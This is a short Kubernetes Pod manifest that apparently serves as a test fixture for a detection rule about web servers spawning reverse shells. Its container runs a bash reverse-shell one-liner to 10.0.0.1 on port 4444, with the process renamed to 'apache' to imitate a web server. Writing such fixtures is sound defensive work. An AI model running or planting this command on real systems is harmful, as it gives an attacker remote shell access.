#command: web server spawns reverse shell (e.g. nginx/apache)
#note: actor_process_name should be nginx/apache/httpd for full rule match

apiVersion: v1
kind: Pod
metadata:
  name: reverse-shell-from-web-server
spec:
  restartPolicy: Never
  containers:
  - name: reverse-shell-from-web-server
    image: angelrita/base-ubuntu:latest
    #imagePullPolicy: Never
    command: ['bash']
    args: ["-c", "exec -a apache bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"]
